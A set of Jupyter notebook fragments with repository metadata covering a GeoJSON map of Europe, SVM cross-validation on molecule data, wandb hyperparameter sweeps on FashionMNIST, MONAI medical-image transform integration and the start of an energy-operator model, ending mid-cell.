"from ipyleaflet import Map, GeoJSON \nimport json \nimport os \nimport requests ",
"_____no_output_____"
],
[
"if not os.path.exists('europe_110.geo.json'): \n url = 'https://github.com/jupyter-widgets/ipyleaflet/raw/master/examples/europe_110.geo.json' \n r = requests.get(url) \n with open('europe_110.geo.json', 'w') as f: \n f.write(r.content.decode(\"utf-8\"))\n \nwith open('europe_110.geo.json', 'r') as f: \n data = json.load(f)\n\nm = Map(center=(50.6252978589571, 0.34580993652344), zoom=3) \ngeo_json = GeoJSON(data=data, style = {'color': 'green', 'opacity':1, 'weight':1.9, 'dashArray':'9', 'fillOpacity':0.1})\nm.add_layer(geo_json)\nm",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb294daeb3095db12e3f4309e93dff881b140998 | 3,842 | ipynb | Jupyter Notebook | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | First model CV.ipynb | PaolaRondon/Biomol_classifier | 5590942222561441792eb9eab877fd1159a2e0ac | [
"BSD-3-Clause"
] | null | null | null | 22.869048 | 84 | 0.544768 | [
[
[
"import pandas as pd\nimport os\nimport time\nimport math\nimport matplotlib.pyplot as plt\n%matplotlib inline \nplt.rcParams.update({'figure.max_open_warning': 0})",
"_____no_output_____"
],
[
"mixed_df=pd.read_csv(\"molecules.csv\",sep=\"\\t\")",
"_____no_output_____"
],
[
"from sklearn.model_selection import cross_validate\nfrom sklearn.svm import LinearSVC",
"_____no_output_____"
],
[
"def get_data_and_true_prediction(df,not_wanted_features:list):\n temp_df=df.drop(not_wanted_features,axis=1)\n y=temp_df[temp_df.columns[-1]]\n x=temp_df.drop([temp_df.columns[-1]],axis=1)\n \n return x,y ",
"_____no_output_____"
],
[
"def get_roc_auc_score(x,y,model): # gets roc auc average\n cv_results = cross_validate(model, x, y, cv=10,scoring=('roc_auc'))\n for c,i in enumerate(cv_results['test_score']):\n print(f\"iteration {c+1}: {i}\")\n roc_auc_avrg=cv_results['test_score'].mean()\n \n return roc_auc_avrg ",
"_____no_output_____"
],
[
"x,y = get_data_and_true_prediction(mixed_df,['m_name'])",
"_____no_output_____"
],
[
"clf = LinearSVC(random_state=0, dual=False)",
"_____no_output_____"
],
[
"score = get_roc_auc_score(x,y,clf)",
"iteration 1: 0.8908730158730158\niteration 2: 0.8883928571428571\niteration 3: 0.8695436507936508\niteration 4: 0.8695436507936508\niteration 5: 0.8694556451612903\niteration 6: 0.9007056451612903\niteration 7: 0.8491155046826222\niteration 8: 0.8985431841831425\niteration 9: 0.9198751300728408\niteration 10: 0.8964620187304891\n"
],
[
"print (f\"default model roc auc score = {score}\")",
"default model roc auc score = 0.8852510302594849\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2962316dabf55926bc2c2ebba8f6dba1f67710 | 340,488 | ipynb | Jupyter Notebook | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 399 | 2019-05-10T01:30:46.000Z | 2022-03-27T17:20:13.000Z | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 2 | 2019-11-25T15:46:09.000Z | 2021-03-01T13:25:46.000Z | Hyperparameter Sweeps with TF 2.0 & W&B/Bayesian_Search_W&B.ipynb | joe733/TF-2.0-Hacks | 41e1dcf9d4d77f926731423c2a575067e0a77312 | [
"Apache-2.0"
] | 89 | 2019-06-06T10:16:18.000Z | 2021-12-26T01:32:48.000Z | 64.206675 | 245 | 0.486672 | [
[
[
"# Select TensorFlow 2.0 environment (works only on Colab)\n%tensorflow_version 2.x",
"TensorFlow 2.x selected.\n"
],
[
"# Install wandb (ignore if already done)\n!pip install wandb",
"_____no_output_____"
],
[
"# Authorize wandb\n!wandb login",
"_____no_output_____"
],
[
"# Imports\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.layers import *\nfrom wandb.keras import WandbCallback\nimport tensorflow as tf\nimport numpy as np\nimport wandb\nimport time",
"_____no_output_____"
],
[
"# Fix the random generator seeds for better reproducibility\ntf.random.set_seed(67)\nnp.random.seed(67)",
"_____no_output_____"
],
[
"# Load the dataset\nfashion_mnist = tf.keras.datasets.fashion_mnist\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\n\n# Scale the pixel values of the images to \ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# Reshape the pixel values so that they are compatible with\n# the conv layers\ntrain_images = train_images.reshape(-1, 28, 28, 1)\ntest_images = test_images.reshape(-1, 28, 28, 1)",
"Downloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-labels-idx1-ubyte.gz\n32768/29515 [=================================] - 0s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/train-images-idx3-ubyte.gz\n26427392/26421880 [==============================] - 1s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-labels-idx1-ubyte.gz\n8192/5148 [===============================================] - 0s 0us/step\nDownloading data from https://storage.googleapis.com/tensorflow/tf-keras-datasets/t10k-images-idx3-ubyte.gz\n4423680/4422102 [==============================] - 0s 0us/step\n"
],
[
"# Specify the labels of FashionMNIST dataset, it would\n# be needed later 😉\nlabels = [\"T-shirt/top\",\"Trouser\",\"Pullover\",\"Dress\",\"Coat\",\n \"Sandal\",\"Shirt\",\"Sneaker\",\"Bag\",\"Ankle boot\"]",
"_____no_output_____"
],
[
"METHOD = 'bayes' # change to 'random' or 'bayes' when necessary and rerun",
"_____no_output_____"
],
[
"def train():\n # Prepare data tuples\n (X_train, y_train) = train_images, train_labels\n (X_test, y_test) = test_images, test_labels\n \n # Default values for hyper-parameters we're going to sweep over\n configs = {\n 'layers': 128,\n 'batch_size': 64,\n 'epochs': 5,\n 'method': METHOD\n }\n \n # Initilize a new wandb run\n wandb.init(project='hyperparameter-sweeps-comparison', config=configs)\n \n # Config is a variable that holds and saves hyperparameters and inputs\n config = wandb.config\n\n # Add the config items to wandb\n if wandb.run:\n wandb.config.update({k: v for k, v in configs.items() if k not in dict(wandb.config.user_items())})\n \n # Define the model\n model = Sequential([\n Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)),\n MaxPooling2D((2,2)),\n Conv2D(64, (3, 3), activation='relu'),\n MaxPooling2D((2,2)),\n Conv2D(64, (3, 3), activation='relu'),\n GlobalAveragePooling2D(),\n Dense(config.layers, activation=tf.nn.relu),\n Dense(10, activation='softmax')\n ])\n \n # Compile the model\n model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n \n # Train the model\n model.fit(X_train, y_train, \n epochs=config.epochs,\n batch_size=config.batch_size,\n validation_data=(X_test, y_test),\n callbacks=[WandbCallback(data_type=\"image\", \n validation_data=(X_test, y_test), labels=labels)])",
"_____no_output_____"
],
[
"# A function to specify the tuning configuration, it would also\n# return us a sweep id (required for running the sweep)\ndef get_sweep_id(method):\n sweep_config = {\n 'method': method,\n 'metric': {\n 'name': 'accuracy',\n 'goal': 'maximize' \n },\n 'parameters': {\n 'layers': {\n 'values': [32, 64, 96, 128, 256]\n },\n 'batch_size': {\n 'values': [32, 64, 96, 128]\n },\n 'epochs': {\n 'values': [5, 10, 15]\n }\n }\n }\n sweep_id = wandb.sweep(sweep_config, project='hyperparameter-sweeps-comparison')\n \n return sweep_id",
"_____no_output_____"
],
[
"# Create a sweep for *grid* search\nsweep_id = get_sweep_id('grid')",
"Create sweep with ID: t1kn8296\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/t1kn8296\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: 86mr9bse with config:\n\tbatch_size: 32\n\tepochs: 5\n\tlayers: 32\nwandb: Agent Started Run: 86mr9bse\n"
],
[
"# Create a sweep for *random* search (run METHOD cell first and then train())\nsweep_id = get_sweep_id('random')",
"Create sweep with ID: vb7k0mim\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/vb7k0mim\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: 00e6phxg with config:\n\tbatch_size: 96\n\tepochs: 5\n\tlayers: 96\nwandb: Agent Started Run: 00e6phxg\n"
],
[
"# Create a sweep for *Bayesian* search (run METHOD cell first and then train())\nsweep_id = get_sweep_id('bayes')",
"Create sweep with ID: pu7llntm\nSweep URL: https://app.wandb.ai/sayakpaul/hyperparameter-sweeps-comparison/sweeps/pu7llntm\n"
],
[
"# Run the sweep\nwandb.agent(sweep_id, function=train)",
"wandb: Agent Starting Run: s4a9kng3 with config:\n\tbatch_size: 32\n\tepochs: 5\n\tlayers: 64\nwandb: Agent Started Run: s4a9kng3\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb296f780991406eda18548d07e9ef06a8ceb0b4 | 84,263 | ipynb | Jupyter Notebook | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | 1 | 2020-07-09T08:03:22.000Z | 2020-07-09T08:03:22.000Z | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | null | null | null | examples/notebooks/integrate_3rd_party_transforms.ipynb | erexhepa/MONAI | 98210a266db428a0769fde260dda0703b1c4ea95 | [
"Apache-2.0"
] | null | null | null | 254.570997 | 74,728 | 0.92381 | [
[
[
"# Integrate 3rd party transforms into MONAI program",
"_____no_output_____"
],
[
"This tutorial shows how to integrate 3rd party transforms into MONAI program. \nMainly shows transforms from `BatchGenerator`, `TorchIO`, `Rising` and `ITK`.",
"_____no_output_____"
]
],
[
[
"! pip install batchgenerators==0.20.1",
"_____no_output_____"
],
[
"! pip install torchio==0.16.21",
"_____no_output_____"
],
[
"! pip install rising==0.2.0",
"_____no_output_____"
],
[
"! pip install itk==5.1.0",
"_____no_output_____"
],
[
"# Copyright 2020 MONAI Consortium\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom monai.transforms import \\\n LoadNiftid, AddChanneld, ScaleIntensityRanged, CropForegroundd, \\\n Spacingd, Orientationd, SqueezeDimd, ToTensord, adaptor, Compose\nimport monai\nfrom monai.utils import set_determinism\nfrom batchgenerators.transforms.color_transforms import ContrastAugmentationTransform\nfrom torchio.transforms import RescaleIntensity\nfrom rising.random import DiscreteParameter\nfrom rising.transforms import Mirror\nfrom itk import median_image_filter",
"_____no_output_____"
]
],
[
[
"## Set MSD Spleen dataset path\nThe Spleen dataset can be downloaded from http://medicaldecathlon.com/.",
"_____no_output_____"
]
],
[
[
"data_root = '/workspace/data/medical/Task09_Spleen'\ntrain_images = sorted(glob.glob(os.path.join(data_root, 'imagesTr', '*.nii.gz')))\ntrain_labels = sorted(glob.glob(os.path.join(data_root, 'labelsTr', '*.nii.gz')))\ndata_dicts = [{'image': image_name, 'label': label_name}\n for image_name, label_name in zip(train_images, train_labels)]",
"_____no_output_____"
]
],
[
[
"## Set deterministic training for reproducibility",
"_____no_output_____"
]
],
[
[
"set_determinism(seed=0)",
"_____no_output_____"
]
],
[
[
"## Setup MONAI transforms",
"_____no_output_____"
]
],
[
[
"monai_transforms = [\n LoadNiftid(keys=['image', 'label']),\n AddChanneld(keys=['image', 'label']),\n Spacingd(keys=['image', 'label'], pixdim=(1.5, 1.5, 2.), mode=('bilinear', 'nearest')),\n Orientationd(keys=['image', 'label'], axcodes='RAS'),\n ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),\n CropForegroundd(keys=['image', 'label'], source_key='image')\n]",
"_____no_output_____"
]
],
[
[
"## Setup BatchGenerator transforms\nNote:\n1. BatchGenerator requires the arg is `**data`, can't compose with MONAI transforms directly, need `adaptor`.\n2. BatchGenerator requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].",
"_____no_output_____"
]
],
[
[
"batch_generator_transforms = ContrastAugmentationTransform(data_key='image')",
"_____no_output_____"
]
],
[
[
"## Setup TorchIO transforms\nNote:\n1. TorchIO specifies several keys internally, use `adaptor` if conflicts.\n2. There are few example or tutorial, hard to quickly get start.\n3. The TorchIO transforms depend on many TorchIO modules(Subject, Image, ImageDataset, etc.), not easy to support MONAI dict input data.\n4. It can handle PyTorch Tensor data(shape: [C, H, W, D]) directly, so used it to handle Tensor in this tutorial.\n5. If input data is Tensor, it can't support dict type, need `adaptor`.",
"_____no_output_____"
]
],
[
[
"torchio_transforms = RescaleIntensity(out_min_max=(0., 1.), percentiles=(0.05, 99.5))",
"_____no_output_____"
]
],
[
[
"## Setup Rising transforms\nNote:\n1. Rising inherits from PyTorch `nn.Module`, expected input data type is PyTorch Tensor, so can only work after `ToTensor`.\n2. Rising requires data shape is [B, C, H, W, D], MONAI requires [C, H, W, D].\n3. Rising requires the arg is `**data`, need `adaptor`.",
"_____no_output_____"
]
],
[
[
"rising_transforms = Mirror(dims=DiscreteParameter((0, 1, 2)), keys=['image', 'label'])",
"_____no_output_____"
]
],
[
[
"## Setup ITK transforms\nNote:\n1. ITK transform function API has several args(not only `data`), need to set args in wrapper before Compose.\n2. If input data is Numpy, ITK can't support dict type, need wrapper to convert the format.\n3. ITK expects input shape [H, W, [D]], so handle every channel and stack the results.",
"_____no_output_____"
]
],
[
[
"def itk_transforms(x):\n smoothed = list()\n for channel in x['image']:\n smoothed.append(median_image_filter(channel, radius=2))\n x['image'] = np.stack(smoothed)\n return x",
"_____no_output_____"
]
],
[
[
"## Compose all transforms",
"_____no_output_____"
]
],
[
[
"transform = Compose(monai_transforms + [\n itk_transforms,\n # add another dim as BatchGenerator and Rising expects shape [B, C, H, W, D]\n AddChanneld(keys=['image', 'label']),\n adaptor(batch_generator_transforms, {'image': 'image'}),\n ToTensord(keys=['image', 'label']),\n adaptor(rising_transforms, {'image': 'image', 'label': 'label'}),\n # squeeze shape from [B, C, H, W, D] to [C, H, W, D] for TorchIO transforms\n SqueezeDimd(keys=['image', 'label'], dim=0),\n adaptor(torchio_transforms, 'image', {'image': 'data'})\n])",
"_____no_output_____"
]
],
[
[
"## Check transforms in DataLoader",
"_____no_output_____"
]
],
[
[
"check_ds = monai.data.Dataset(data=data_dicts, transform=transform)\ncheck_loader = monai.data.DataLoader(check_ds, batch_size=1)\ncheck_data = monai.utils.misc.first(check_loader)\nimage, label = (check_data['image'][0][0], check_data['label'][0][0])\nprint(f\"image shape: {image.shape}, label shape: {label.shape}\")\n# plot the slice [:, :, 80]\nplt.figure('check', (12, 6))\nplt.subplot(1, 2, 1)\nplt.title('image')\nplt.imshow(image[:, :, 80], cmap='gray')\nplt.subplot(1, 2, 2)\nplt.title('label')\nplt.imshow(label[:, :, 80])\nplt.show()",
"image shape: torch.Size([329, 282, 136]), label shape: torch.Size([329, 282, 136])\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb297d14969e03e8e272cb34f59f30c9caac5480 | 12,838 | ipynb | Jupyter Notebook | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | src/word_et.ipynb | veeral-agarwal/Dependency-Parser-Hindi | 4421e4165093acbc788090aef5c0f90259837f72 | [
"MIT"
] | null | null | null | 42.509934 | 276 | 0.341798 | [
[
[
"import sys\nimport pickle\nimport json\nimport re\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nfrom sklearn.svm import LinearSVC\nfrom sklearn.metrics import classification_report",
"_____no_output_____"
],
[
"def feature_transform(train_file, words):\n \n words_len = len(words)\n row_idx = []\n column_idx = []\n data = []\n y = []\n ctr = 0\n feature_length = words_len # Per head\n\n f = open(train_file)\n\n for line in f:\n if(line.rstrip()):\n line = re.sub(\"\\s+\",\" \",line)\n line1 = line.split(\";\")\n\n a1 = line1[0].split(\" \")\n a2 = line1[1].split(\" \")\n a3 = line1[2].split(\" \")\n a4 = line1[3].strip()\n\n\n if a3[1] != \"U\":\n \n ctr += 1\n if(a1[0] == \"H\"):\n column_idx.append(words.index(a1[1]))\n\n elif(a1[0] == \"ROOT\"):\n column_idx.append(words.index(\"ROOT\"))\n\n row_idx += [ctr-1]*2\n data += [1] *2\n column_idx.append(feature_length + words.index(a2[2]))\n\n y.append(a4)\n\n f.close()\n\n X = csr_matrix((data, (row_idx, column_idx)), shape=(ctr,2*(words_len)))\n \n \n return X, y",
"_____no_output_____"
],
[
"listfile = \"data_tokens.json\"\nf = open(listfile)\ndata = json.load(f)\nf.close()\n\nwords = data[\"words\"]\n\ntrain_file = 'training_data.txt'\ntest_file = \"testing_data.txt\"\n\nX_train, y_train = feature_transform(train_file, words)\nX_test, y_test = feature_transform(test_file, words)\n\n\nmodel = LinearSVC()\nmodel.fit(X_train, y_train)\n\npred_train = model.predict(X_train)\npred_test = model.predict(X_test)",
"_____no_output_____"
],
[
"print(classification_report(y_train, pred_train))",
"/home/ayan/anaconda3/lib/python3.8/site-packages/sklearn/metrics/_classification.py:1221: UndefinedMetricWarning: Precision and F-score are ill-defined and being set to 0.0 in labels with no predicted samples. Use `zero_division` parameter to control this behavior.\n _warn_prf(average, modifier, msg_start, len(result))\n"
],
[
"print(classification_report(y_test, pred_test))",
" precision recall f1-score support\n\n K7a 0.00 0.00 0.00 1\n ROOT 1.00 1.00 1.00 1432\n UNDEF 0.00 0.00 0.00 0\n adv 0.74 0.65 0.69 147\n ccof 0.86 0.96 0.91 1558\n fragof 0.00 0.00 0.00 0\n jjmod 0.94 0.84 0.89 80\n k1 0.58 0.72 0.64 1584\n k1s 0.73 0.47 0.57 210\n k1u 0.00 0.00 0.00 9\n k2 0.67 0.59 0.63 1369\n k2g 0.00 0.00 0.00 0\n k2p 0.37 0.17 0.24 40\n k2s 0.33 0.07 0.11 29\n k2u 0.00 0.00 0.00 1\n k3 0.25 0.09 0.14 54\n k4 0.47 0.38 0.42 197\n k4a 0.30 0.18 0.22 17\n k5 0.31 0.09 0.14 125\n k7 0.53 0.43 0.47 831\n k7a 0.60 0.19 0.29 94\n k7p 0.55 0.61 0.58 434\n k7t 0.79 0.78 0.79 615\n k7tu 0.00 0.00 0.00 1\n mod 0.00 0.00 0.00 1\n nmod 0.70 0.59 0.64 489\n nmod__emph 1.00 0.33 0.50 3\n nmod__k1inv 0.55 0.69 0.61 78\n nmod__k2inv 0.29 0.16 0.20 32\nnmod__pofinv 0.00 0.00 0.00 3\n nmod__relc 0.71 0.65 0.68 23\n pof 0.69 0.81 0.74 1063\n pof__inv 0.00 0.00 0.00 1\n r6 0.77 0.86 0.81 1686\n r6-k1 0.14 0.11 0.12 18\n r6-k2 0.57 0.57 0.57 184\n ras-NEG 0.00 0.00 0.00 6\n ras-k1 0.13 0.06 0.08 52\n ras-k2 0.00 0.00 0.00 20\n ras-k7 0.00 0.00 0.00 3\n ras-k7p 0.00 0.00 0.00 2\n ras-pof 0.00 0.00 0.00 1\n rbmod 0.67 1.00 0.80 2\n rbmod__relc 0.00 0.00 0.00 1\n rd 0.25 0.08 0.12 25\n rh 0.47 0.40 0.43 100\n rs 0.00 0.00 0.00 21\n rsp 0.38 0.19 0.25 16\n rsym 1.00 1.00 1.00 1419\n rt 0.46 0.40 0.43 188\n sent-adv 0.67 0.68 0.68 69\n vmod 0.73 0.55 0.63 288\n\n accuracy 0.75 14622\n macro avg 0.39 0.33 0.35 14622\nweighted avg 0.73 0.75 0.73 14622\n\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb299203f44189bb51b4c65ee32f42f09eab64db | 8,247 | ipynb | Jupyter Notebook | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | 2 | 2019-07-10T12:16:22.000Z | 2019-08-09T12:47:00.000Z | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | 9 | 2019-03-08T16:27:07.000Z | 2021-09-22T17:03:10.000Z | plot_scripts/Fig15-TDG_candidates_moments.ipynb | AMIGA-IAA/hcg-16 | 8c110ee6f9e39e5d285c74678c806bf273b558b3 | [
"MIT"
] | null | null | null | 28.835664 | 561 | 0.565781 | [
[
[
"import matplotlib,aplpy\nfrom astropy.io import fits\nfrom general_functions import *\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"font = {'size' : 14, 'family' : 'serif', 'serif' : 'cm'}\nplt.rc('font', **font)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['lines.linewidth'] = 1\nplt.rcParams['axes.linewidth'] = 1\n\n#Set to true to save pdf versions of figures\nsave_figs = True",
"_____no_output_____"
]
],
[
[
"The files used to make the following plot are:",
"_____no_output_____"
]
],
[
[
"r_image_decals = 'HCG16_DECaLS_r_cutout.fits'\ngrz_image_decals = 'HCG16_DECaLS_cutout.jpeg'\nobj_list = ['NW_clump','E_clump','S_clump']\n#+'_mom0th.fits' or +'_mom1st.fits'",
"_____no_output_____"
]
],
[
[
"1. An $r$-band DECaLS fits image of HCG 16.\n2. A combined $grz$ jpeg image from DECaLS covering exactly the same field.\n\nThese files were downloaded directly from the [DECaLS public website](http://legacysurvey.org/). The exact parameters defining the region and pixel size of these images is contained in the [pipeline.yml](pipeline.yml) file.\n\n3. Moment 0 and 1 maps of each candidate tidal dwarf galaxy.\n\nThe moment 0 and 1 maps of the galaxies were generated in the *imaging* step of the workflow using CASA. The exact steps are included in the [imaging.py](casa/imaging.py) script. The masks used to make these moment maps were constructed manually using the [SlicerAstro](http://github.com/Punzo/SlicerAstro) software package. They were downloaded along with the raw data from the EUDAT service [B2SHARE](http://b2share.eudat.eu) at the beginnning of the workflow execution. The exact location of the data are given in the [pipeline.yml](pipeline.yml) file.",
"_____no_output_____"
],
[
"Make moment 0 contour overlays and moment 1 maps.",
"_____no_output_____"
]
],
[
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.356, -10.125, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='NW_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-NW_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='NW_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.356, -10.125, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=3530.,vmax=3580.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-NW_clump_mom1.pdf')",
"_____no_output_____"
],
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.463, -10.181, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='E_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-E_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='E_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.463, -10.181, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=3875.,vmax=3925.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-E_clump_mom1.pdf')",
"_____no_output_____"
],
[
"#Initialise figure using DECaLS r-band image\nf = aplpy.FITSFigure(r_image_decals,figsize=(6.,4.3),dimensions=[0,1])\n\n#Display DECaLS grz image\nf.show_rgb(grz_image_decals)\n\n#Recentre and resize\nf.recenter(32.475, -10.215, radius=1.5/60.)\n\n#Overlay HI contours\nf.show_contour(data='S_clump'+'_mom0th.fits',dimensions=[0,1],slices=[0],\n colors='lime',levels=numpy.arange(0.1,5.,0.05))\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-S_clump_mom0_cont.pdf')",
"_____no_output_____"
],
[
"#Clip the moment 1 map\nmask_mom1(gal='S_clump',level=0.1)\n\n#Initialise figure for clipped map\nf = aplpy.FITSFigure('tmp.fits',figsize=(6.,4.3),dimensions=[0,1])\n\n#Recentre and resize\nf.recenter(32.475, -10.215, radius=1.5/60.)\n\n#Set colourbar scale\nf.show_colorscale(cmap='jet',vmin=4050.,vmax=4100.)\n\n#Add grid lines\nf.add_grid()\nf.grid.set_color('black')\n\n#Show and label colourbar \nf.add_colorbar()\nf.colorbar.set_axis_label_text('$V_\\mathrm{opt}$ [km/s]')\n\n#Add beam ellipse\nf.add_beam()\nf.beam.set_color('k')\nf.beam.set_corner('bottom right')\n\n#Save\nif save_figs:\n plt.savefig('Fig15-S_clump_mom1.pdf')",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2994b4218aac1dbc757d2269b007556b619e37 | 106,354 | ipynb | Jupyter Notebook | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | Ref/20.01.1300_find_eps_base_F/find_Z_opt_eps_nvar40_g1_nseq5k.ipynb | danhtaihoang/e-machine | 9ff075ce1e476b8136da291b05abb34c71a4df9d | [
"MIT"
] | null | null | null | 117.518232 | 45,572 | 0.865111 | [
[
[
"import matplotlib.pyplot as plt\nimport numpy as np\nimport numpy.linalg as nplin\nimport itertools\n#from coniii import *\nfrom sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"np.random.seed(0)",
"_____no_output_____"
],
[
"def operators(s):\n #generate terms in the energy function\n n_seq,n_var = s.shape\n ops = np.zeros((n_seq,n_var+int(n_var*(n_var-1)/2.0)))\n\n jindex = 0\n for index in range(n_var):\n ops[:,jindex] = s[:,index]\n jindex +=1\n\n for index in range(n_var-1):\n for index1 in range(index+1,n_var):\n ops[:,jindex] = s[:,index]*s[:,index1]\n jindex +=1\n \n return ops",
"_____no_output_____"
],
[
"def energy_ops(ops,w):\n return np.sum(ops*w[np.newaxis,:],axis=1)",
"_____no_output_____"
],
[
